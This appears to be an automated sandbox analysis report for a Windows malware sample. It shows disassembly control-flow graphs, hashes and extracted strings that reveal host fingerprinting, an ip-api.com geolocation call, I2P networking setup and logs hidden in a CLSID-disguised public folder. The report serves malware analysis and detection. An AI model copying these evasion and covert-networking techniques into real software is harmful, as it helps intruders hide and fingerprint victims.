                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 937 7ff6be0393f0-7ff6be03940a call 7ff6be031694 940 7ff6be039410-7ff6be039425 call 7ff6be031613 937->940 941 7ff6be039922 937->941 946 7ff6be039427-7ff6be039455 940->946 947 7ff6be03947b 940->947 943 7ff6be039936-7ff6be03993b 941->943 945 7ff6be03948d-7ff6be0394a4 call 7ff6be0399e2 943->945 952 7ff6be0394a9-7ff6be0394b6 945->952 953 7ff6be039457-7ff6be03945c 946->953 954 7ff6be03945e-7ff6be039479 call 7ff6be0399e2 946->954 948 7ff6be039480-7ff6be03948b FreeLibrary 947->948 948->945 951 7ff6be0394b7-7ff6be0394f0 GetNativeSystemInfo GetWindowsDirectoryA 948->951 955 7ff6be0394f6-7ff6be039517 GetLastError call 7ff6be0399e2 951->955 956 7ff6be0395ce-7ff6be0395f1 call 7ff6be0399e2 951->956 953->948 954->948 964 7ff6be039519 955->964 965 7ff6be039537-7ff6be03953d 955->965 956->945 963 7ff6be0395f7-7ff6be03962d call 7ff6be035602 956->963 973 7ff6be0396de-7ff6be0396fa call 7ff6be0399e2 963->973 974 7ff6be039633-7ff6be039635 963->974 968 7ff6be03952d-7ff6be039532 964->968 969 7ff6be03951b-7ff6be039528 964->969 965->943 967 7ff6be039543-7ff6be039549 965->967 971 7ff6be03954b-7ff6be03954e 967->971 972 7ff6be039582-7ff6be039588 967->972 968->945 969->968 975 7ff6be03956c-7ff6be039572 971->975 976 7ff6be039550-7ff6be039553 971->976 977 7ff6be03995e-7ff6be039963 972->977 978 7ff6be03958e-7ff6be039594 972->978 993 7ff6be0396ff 973->993 974->945 979 7ff6be03963b-7ff6be039698 GetVolumeInformationA 974->979 982 7ff6be039578-7ff6be03957d 975->982 983 7ff6be039954-7ff6be039959 975->983 980 7ff6be039559-7ff6be03955c 976->980 981 7ff6be039940-7ff6be039945 976->981 977->945 984 7ff6be039968-7ff6be03996d 978->984 985 7ff6be03959a-7ff6be0395a0 978->985 987 7ff6be03979b-7ff6be0397cd call 7ff6be0399e2 979->987 988 7ff6be03969e-7ff6be0396c4 GetLastError call 7ff6be0399e2 979->988 989 7ff6be03994a-7ff6be03994f 980->989 990 7ff6be039562-7ff6be039567 980->990 981->945 982->945 983->945 984->945 991 7ff6be0395a6-7ff6be0395ab 985->991 992 7ff6be039972-7ff6be039977 985->992 1000 7ff6be0397e1-7ff6be0397e8 987->1000 1001 7ff6be0397cf-7ff6be0397db strlen 987->1001 998 7ff6be0396c6 988->998 999 7ff6be039704-7ff6be03970a 988->999 989->945 990->945 991->945 992->945 993->974 1006 7ff6be0396cc-7ff6be0396d9 998->1006 1007 7ff6be039853-7ff6be039858 998->1007 1002 7ff6be039867-7ff6be03986c 999->1002 1003 7ff6be039710 999->1003 1005 7ff6be0397ec-7ff6be039849 call 7ff6be0399e2 1000->1005 1001->1000 1004 7ff6be0398a3-7ff6be0398a7 1001->1004 1002->945 1008 7ff6be039749-7ff6be03974f 1003->1008 1009 7ff6be039712-7ff6be039715 1003->1009 1004->1000 1011 7ff6be0398ad-7ff6be0398b1 1004->1011 1014 7ff6be03984e 1005->1014 1006->973 1007->945 1015 7ff6be03988f-7ff6be039894 1008->1015 1016 7ff6be039755-7ff6be03975b 1008->1016 1012 7ff6be039717-7ff6be03971a 1009->1012 1013 7ff6be039733-7ff6be039739 1009->1013 1011->1000 1017 7ff6be0398b7-7ff6be0398ea _errno call 7ff6be03e4f0 _errno 1011->1017 1018 7ff6be039871-7ff6be039876 1012->1018 1019 7ff6be039720-7ff6be039723 1012->1019 1020 7ff6be03973f-7ff6be039744 1013->1020 1021 7ff6be039885-7ff6be03988a 1013->1021 1014->952 1015->945 1022 7ff6be039899-7ff6be03989e 1016->1022 1023 7ff6be039761-7ff6be039767 1016->1023 1030 7ff6be0398ec-7ff6be0398ef 1017->1030 1031 7ff6be0398fa-7ff6be03991d _errno call 7ff6be0399e2 1017->1031 1018->945 1025 7ff6be039729-7ff6be03972e 1019->1025 1026 7ff6be03987b-7ff6be039880 1019->1026 1020->945 1021->945 1022->945 1027 7ff6be039769-7ff6be03976e 1023->1027 1028 7ff6be039773-7ff6be039778 1023->1028 1025->945 1026->945 1027->945 1028->945 1030->1005 1032 7ff6be0398f5 1030->1032 1031->1000 1032->1000
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                                                                                                                                                  • API String ID: 3828489143-3798070276
                                                                                                                                                  • Opcode ID: e1b7c46f77d045b6d29ba8d43c4d9af711e08a04f013bfcd733600930ec2894c
                                                                                                                                                  • Instruction ID: 3ea174c2af83ddeba95a1d1f9281e7789a84695f8ff532ed2032cc74ce040f67
                                                                                                                                                  • Opcode Fuzzy Hash: e1b7c46f77d045b6d29ba8d43c4d9af711e08a04f013bfcd733600930ec2894c
                                                                                                                                                  • Instruction Fuzzy Hash: A6D14B22E0C65391FA709B5CE540BB97270EBB8755F950033FB4ED76A8DE2DE8648381
                                                                                                                                                  Function 00007FF8BFB8330E Relevance: 39.4, APIs: 7, Strings: 19, Instructions: 381COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1035 7ff8bfb8330e-7ff8bfb8332e 1036 7ff8bfb8339c-7ff8bfb833a4 1035->1036 1037 7ff8bfb83330-7ff8bfb83338 1035->1037 1038 7ff8bfb833b7-7ff8bfb833cd call 7ff8bfb8464b 1036->1038 1039 7ff8bfb833a6-7ff8bfb833ab 1036->1039 1040 7ff8bfb8333a-7ff8bfb83341 1037->1040 1041 7ff8bfb83347-7ff8bfb8334f 1037->1041 1048 7ff8bfb83a74-7ff8bfb83a85 1038->1048 1042 7ff8bfb833ad-7ff8bfb833b2 1039->1042 1043 7ff8bfb833d2-7ff8bfb833d7 1039->1043 1040->1041 1045 7ff8bfb8379b-7ff8bfb837b5 call 7ff8bfb8464b 1040->1045 1046 7ff8bfb83a6f 1041->1046 1047 7ff8bfb83355-7ff8bfb8335d 1041->1047 1042->1048 1050 7ff8bfb833d9-7ff8bfb833df 1043->1050 1051 7ff8bfb83406-7ff8bfb8358e call 7ff8bfb82800 call 7ff8bfb84170 call 7ff8bfb88684 1043->1051 1045->1041 1063 7ff8bfb837bb-7ff8bfb837c3 1045->1063 1046->1048 1053 7ff8bfb8335f-7ff8bfb83366 1047->1053 1054 7ff8bfb83372-7ff8bfb8337d 1047->1054 1050->1051 1057 7ff8bfb833e1-7ff8bfb83401 1050->1057 1089 7ff8bfb83594-7ff8bfb835c0 call 7ff8bfb84170 call 7ff8bfb88684 1051->1089 1090 7ff8bfb83701-7ff8bfb83730 call 7ff8bfb85fd5 1051->1090 1053->1054 1060 7ff8bfb83368-7ff8bfb83370 1053->1060 1055 7ff8bfb83a86-7ff8bfb83a8b 1054->1055 1056 7ff8bfb83383-7ff8bfb8338c 1054->1056 1055->1048 1061 7ff8bfb83915-7ff8bfb8393b 1056->1061 1062 7ff8bfb83392-7ff8bfb83397 1056->1062 1057->1048 1060->1054 1060->1056 1065 7ff8bfb83a8d-7ff8bfb83a92 1061->1065 1066 7ff8bfb83941-7ff8bfb83948 1061->1066 1062->1048 1067 7ff8bfb8384f-7ff8bfb8386a call 7ff8bfb8464b call 7ff8bfb82f80 1063->1067 1068 7ff8bfb837c9-7ff8bfb837da 1063->1068 1065->1048 1072 7ff8bfb8394a-7ff8bfb83954 1066->1072 1073 7ff8bfb83957-7ff8bfb8397d GetProcessHeap HeapAlloc 1066->1073 1067->1048 1074 7ff8bfb837dc-7ff8bfb837f3 1068->1074 1075 7ff8bfb837f5-7ff8bfb837fe 1068->1075 1072->1073 1079 7ff8bfb8397f-7ff8bfb839c1 memcpy call 7ff8bfb8aa07 1073->1079 1080 7ff8bfb839f1-7ff8bfb83a0c call 7ff8bfb81292 1073->1080 1074->1067 1074->1075 1075->1067 1076 7ff8bfb83800-7ff8bfb83808 1075->1076 1082 7ff8bfb8381d-7ff8bfb83828 1076->1082 1083 7ff8bfb8380a-7ff8bfb83811 1076->1083 1095 7ff8bfb839c7 1079->1095 1096 7ff8bfb83a60-7ff8bfb83a63 1079->1096 1080->1048 1091 7ff8bfb8386f call 7ff8bfb8305e 1082->1091 1092 7ff8bfb8382a-7ff8bfb83832 1082->1092 1083->1082 1088 7ff8bfb83813-7ff8bfb8381b 1083->1088 1088->1082 1088->1092 1125 7ff8bfb8374e-7ff8bfb8377d call 7ff8bfb85fd5 1089->1125 1126 7ff8bfb835c6-7ff8bfb835d2 call 7ff8bfb84692 1089->1126 1090->1089 1109 7ff8bfb83736-7ff8bfb83749 call 7ff8bfb8ed50 1090->1109 1108 7ff8bfb83874-7ff8bfb83879 1091->1108 1098 7ff8bfb8387e-7ff8bfb83898 call 7ff8bfb8464b 1092->1098 1099 7ff8bfb83834-7ff8bfb8384a call 7ff8bfb8464b 1092->1099 1103 7ff8bfb839cc-7ff8bfb839cf 1095->1103 1105 7ff8bfb83a22-7ff8bfb83a24 1096->1105 1117 7ff8bfb8389a-7ff8bfb8389f 1098->1117 1118 7ff8bfb838a4-7ff8bfb83910 call 7ff8bfb82800 call 7ff8bfb8464b call 7ff8bfb89c52 1098->1118 1099->1048 1103->1048 1111 7ff8bfb839d5-7ff8bfb839ec GetProcessHeap HeapFree 1103->1111 1114 7ff8bfb83a26-7ff8bfb83a2e 1105->1114 1115 7ff8bfb83a35-7ff8bfb83a44 call 7ff8bfb8aa84 1105->1115 1108->1048 1109->1089 1111->1048 1114->1115 1120 7ff8bfb83a30-7ff8bfb83a33 1114->1120 1115->1095 1128 7ff8bfb83a46-7ff8bfb83a54 call 7ff8bfb832a5 1115->1128 1117->1048 1118->1048 1120->1115 1127 7ff8bfb83a0e-7ff8bfb83a1e call 7ff8bfb8aaf5 1120->1127 1125->1126 1139 7ff8bfb83783-7ff8bfb83796 call 7ff8bfb8ed50 1125->1139 1141 7ff8bfb835d4-7ff8bfb835e9 1126->1141 1142 7ff8bfb835f1-7ff8bfb83607 call 7ff8bfb84818 1126->1142 1127->1105 1143 7ff8bfb83a56-7ff8bfb83a5b 1128->1143 1144 7ff8bfb83a65-7ff8bfb83a6a 1128->1144 1139->1126 1141->1142 1151 7ff8bfb8362c-7ff8bfb83673 call 7ff8bfb8ac80 1142->1151 1152 7ff8bfb83609-7ff8bfb83625 1142->1152 1143->1103 1144->1103 1155 7ff8bfb836a7-7ff8bfb836af 1151->1155 1156 7ff8bfb83675-7ff8bfb8367d 1151->1156 1152->1151 1158 7ff8bfb836c8-7ff8bfb836fc call 7ff8bfb89c52 1155->1158 1159 7ff8bfb836b1-7ff8bfb836c2 GetProcessHeap HeapFree 1155->1159 1156->1155 1157 7ff8bfb8367f-7ff8bfb8369a call 7ff8bfb81770 1156->1157 1157->1155 1164 7ff8bfb8369c-7ff8bfb836a0 1157->1164 1158->1048 1159->1158 1164->1155
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$TGER$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$h$ip-api.com$last-patch$mem_alloc$referrer
                                                                                                                                                  • API String ID: 0-3139374006
                                                                                                                                                  • Opcode ID: a59f30150775796cf729d42dacd5df686f13eafd5d338df122460e0b1b621434
                                                                                                                                                  • Instruction ID: fad7b1b2de246126d52592ebaaa2794690377ae170ecaacc6295d77309f1d893
                                                                                                                                                  • Opcode Fuzzy Hash: a59f30150775796cf729d42dacd5df686f13eafd5d338df122460e0b1b621434
                                                                                                                                                  • Instruction Fuzzy Hash: 3F124C72A0C68286EB608B9DE4803B9B7A0EB887D4F544235DB9D477E6DF7CE554CB00
                                                                                                                                                  Function 00007FF8BFB88760 Relevance: 37.7, APIs: 9, Strings: 16, Instructions: 167stringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcat$HandleLibraryLoadModule
                                                                                                                                                  • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                                                                                                                                                  • API String ID: 1893813203-492052463
                                                                                                                                                  • Opcode ID: ca066c6045d2f2a4322d3373cf1fe784a61079aaa6ce0be1ffd8e7fa4d20b0cc
                                                                                                                                                  • Instruction ID: 105556b51660528c26000f71e2e3f01d013de8393248e407d63bcaaaab8658c6
                                                                                                                                                  • Opcode Fuzzy Hash: ca066c6045d2f2a4322d3373cf1fe784a61079aaa6ce0be1ffd8e7fa4d20b0cc
                                                                                                                                                  • Instruction Fuzzy Hash: 3B719C31A1DB8392EB219B99E4803FA6395EB887C0F845131DB4D4BB9AEF3CD905C740
                                                                                                                                                  Function 00007FF8BA4F143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1305 7ff8ba4f143c-7ff8ba4f1464 InitializeCriticalSectionAndSpinCount 1306 7ff8ba4f1590-7ff8ba4f15b1 GetLastError call 7ff8ba4f1292 1305->1306 1307 7ff8ba4f146a-7ff8ba4f149e call 7ff8ba4f9cc0 call 7ff8ba4f6dd1 1305->1307 1313 7ff8ba4f15d2-7ff8ba4f15d8 1306->1313 1314 7ff8ba4f15b3 1306->1314 1320 7ff8ba4f1569-7ff8ba4f1581 call 7ff8ba4f1292 1307->1320 1321 7ff8ba4f14a4-7ff8ba4f14bb strlen 1307->1321 1318 7ff8ba4f15de-7ff8ba4f15e4 1313->1318 1319 7ff8ba4f169b 1313->1319 1316 7ff8ba4f1691-7ff8ba4f1696 1314->1316 1317 7ff8ba4f15b9-7ff8ba4f15c6 1314->1317 1316->1320 1317->1313 1322 7ff8ba4f15e6-7ff8ba4f15ec 1318->1322 1323 7ff8ba4f1610-7ff8ba4f1613 1318->1323 1326 7ff8ba4f16a5-7ff8ba4f16aa 1319->1326 1336 7ff8ba4f1586-7ff8ba4f158f 1320->1336 1330 7ff8ba4f14d3-7ff8ba4f14d6 1321->1330 1331 7ff8ba4f14bd-7ff8ba4f14c0 1321->1331 1324 7ff8ba4f15f2-7ff8ba4f15f8 1322->1324 1325 7ff8ba4f16b9-7ff8ba4f16be 1322->1325 1327 7ff8ba4f1615-7ff8ba4f1618 1323->1327 1328 7ff8ba4f162d-7ff8ba4f1633 1323->1328 1332 7ff8ba4f16c3-7ff8ba4f16c8 1324->1332 1333 7ff8ba4f15fe-7ff8ba4f1604 1324->1333 1325->1320 1326->1320 1334 7ff8ba4f1687 1327->1334 1335 7ff8ba4f161a-7ff8ba4f161d 1327->1335 1337 7ff8ba4f1635-7ff8ba4f163a 1328->1337 1338 7ff8ba4f16af 1328->1338 1340 7ff8ba4f14f8-7ff8ba4f1541 strlen fopen 1330->1340 1341 7ff8ba4f14d8-7ff8ba4f14f2 strcat strlen 1330->1341 1331->1330 1339 7ff8ba4f14c2-7ff8ba4f14cf strlen 1331->1339 1332->1320 1344 7ff8ba4f1606-7ff8ba4f160b 1333->1344 1345 7ff8ba4f163f-7ff8ba4f1644 1333->1345 1334->1316 1335->1326 1346 7ff8ba4f1623-7ff8ba4f1628 1335->1346 1337->1320 1338->1325 1339->1330 1342 7ff8ba4f1547-7ff8ba4f1563 call 7ff8ba4f1292 1340->1342 1343 7ff8ba4f165d-7ff8ba4f1678 call 7ff8ba4f1292 1340->1343 1341->1340 1342->1320 1351 7ff8ba4f16cd-7ff8ba4f16e7 call 7ff8ba4f1292 1342->1351 1343->1320 1344->1320 1345->1320 1346->1320 1351->1336
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                                                                                                                                                  • API String ID: 3395718042-2735303109
                                                                                                                                                  • Opcode ID: b880186cb09fe9418d3488624d1c28ca1e4f32ba72a4e66950c71ccbecef1740
                                                                                                                                                  • Instruction ID: 4141a8b117307352745542c9f8566db3858b8bd28fdb28b8d112f7862ef636b9
                                                                                                                                                  • Opcode Fuzzy Hash: b880186cb09fe9418d3488624d1c28ca1e4f32ba72a4e66950c71ccbecef1740
                                                                                                                                                  • Instruction Fuzzy Hash: 6D513F60E0C643C6FB20979DACE13B92254AF477D4F9460B7DF0E066A2DE6EAA45C341
                                                                                                                                                  Function 00007FF8B915143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1207 7ff8b915143c-7ff8b9151464 InitializeCriticalSectionAndSpinCount 1208 7ff8b915146a-7ff8b915149e call 7ff8b915cc60 call 7ff8b9158ff1 1207->1208 1209 7ff8b9151590-7ff8b91515b1 GetLastError call 7ff8b9151292 1207->1209 1222 7ff8b9151569-7ff8b9151581 call 7ff8b9151292 1208->1222 1223 7ff8b91514a4-7ff8b91514bb strlen 1208->1223 1215 7ff8b91515d2-7ff8b91515d8 1209->1215 1216 7ff8b91515b3 1209->1216 1220 7ff8b91515de-7ff8b91515e4 1215->1220 1221 7ff8b915169b 1215->1221 1218 7ff8b91515b9-7ff8b91515c6 1216->1218 1219 7ff8b9151691-7ff8b9151696 1216->1219 1218->1215 1219->1222 1224 7ff8b91515e6-7ff8b91515ec 1220->1224 1225 7ff8b9151610-7ff8b9151613 1220->1225 1230 7ff8b91516a5-7ff8b91516aa 1221->1230 1241 7ff8b9151586-7ff8b915158f 1222->1241 1226 7ff8b91514bd-7ff8b91514c0 1223->1226 1227 7ff8b91514d3-7ff8b91514d6 1223->1227 1228 7ff8b91516b9-7ff8b91516be 1224->1228 1229 7ff8b91515f2-7ff8b91515f8 1224->1229 1231 7ff8b915162d-7ff8b9151633 1225->1231 1232 7ff8b9151615-7ff8b9151618 1225->1232 1226->1227 1234 7ff8b91514c2-7ff8b91514cf strlen 1226->1234 1235 7ff8b91514f8-7ff8b9151541 strlen fopen 1227->1235 1236 7ff8b91514d8-7ff8b91514f2 strcat strlen 1227->1236 1228->1222 1237 7ff8b91515fe-7ff8b9151604 1229->1237 1238 7ff8b91516c3-7ff8b91516c8 1229->1238 1230->1222 1242 7ff8b91516af 1231->1242 1243 7ff8b9151635-7ff8b915163a 1231->1243 1239 7ff8b915161a-7ff8b915161d 1232->1239 1240 7ff8b9151687 1232->1240 1234->1227 1244 7ff8b915165d-7ff8b9151678 call 7ff8b9151292 1235->1244 1245 7ff8b9151547-7ff8b9151563 call 7ff8b9151292 1235->1245 1236->1235 1246 7ff8b915163f-7ff8b9151644 1237->1246 1247 7ff8b9151606-7ff8b915160b 1237->1247 1238->1222 1239->1230 1248 7ff8b9151623-7ff8b9151628 1239->1248 1240->1219 1242->1228 1243->1222 1244->1222 1245->1222 1253 7ff8b91516cd-7ff8b91516e7 call 7ff8b9151292 1245->1253 1246->1222 1247->1222 1248->1222 1253->1241
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                                                                                                                                                  • API String ID: 3395718042-1297835036
                                                                                                                                                  • Opcode ID: 1150151ec345bf13c3b31c0e9be5a53ea1ef8a6f05555bc19399344b667da666
                                                                                                                                                  • Instruction ID: e442ea59e8dc304b59acd59e54db474d07a9e0df6202cd59620257942e7cc784
                                                                                                                                                  • Opcode Fuzzy Hash: 1150151ec345bf13c3b31c0e9be5a53ea1ef8a6f05555bc19399344b667da666
                                                                                                                                                  • Instruction Fuzzy Hash: 10517050E1C7D385FA229F0DB8A03B81255AF467C4F958432DB0E5A6D2DEACF946F341
                                                                                                                                                  Function 00007FF8B918143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1256 7ff8b918143c-7ff8b9181464 InitializeCriticalSectionAndSpinCount 1257 7ff8b918146a-7ff8b918149e call 7ff8b9181770 call 7ff8b918e0f1 1256->1257 1258 7ff8b9181590-7ff8b91815b1 GetLastError call 7ff8b9181292 1256->1258 1273 7ff8b9181569-7ff8b9181581 call 7ff8b9181292 1257->1273 1274 7ff8b91814a4-7ff8b91814bb strlen 1257->1274 1264 7ff8b91815b3 1258->1264 1265 7ff8b91815d2-7ff8b91815d8 1258->1265 1269 7ff8b91815b9-7ff8b91815c6 1264->1269 1270 7ff8b9181691-7ff8b9181696 1264->1270 1266 7ff8b91815de-7ff8b91815e4 1265->1266 1267 7ff8b918169b 1265->1267 1271 7ff8b91815e6-7ff8b91815ec 1266->1271 1272 7ff8b9181610-7ff8b9181613 1266->1272 1277 7ff8b91816a5-7ff8b91816aa 1267->1277 1269->1265 1270->1273 1275 7ff8b91816b9-7ff8b91816be 1271->1275 1276 7ff8b91815f2-7ff8b91815f8 1271->1276 1278 7ff8b918162d-7ff8b9181633 1272->1278 1279 7ff8b9181615-7ff8b9181618 1272->1279 1290 7ff8b9181586-7ff8b918158f 1273->1290 1281 7ff8b91814bd-7ff8b91814c0 1274->1281 1282 7ff8b91814d3-7ff8b91814d6 1274->1282 1275->1273 1286 7ff8b91815fe-7ff8b9181604 1276->1286 1287 7ff8b91816c3-7ff8b91816c8 1276->1287 1277->1273 1291 7ff8b91816af 1278->1291 1292 7ff8b9181635-7ff8b918163a 1278->1292 1288 7ff8b918161a-7ff8b918161d 1279->1288 1289 7ff8b9181687 1279->1289 1281->1282 1283 7ff8b91814c2-7ff8b91814cf strlen 1281->1283 1284 7ff8b91814f8-7ff8b9181541 strlen fopen 1282->1284 1285 7ff8b91814d8-7ff8b91814f2 strcat strlen 1282->1285 1283->1282 1293 7ff8b918165d-7ff8b9181678 call 7ff8b9181292 1284->1293 1294 7ff8b9181547-7ff8b9181563 call 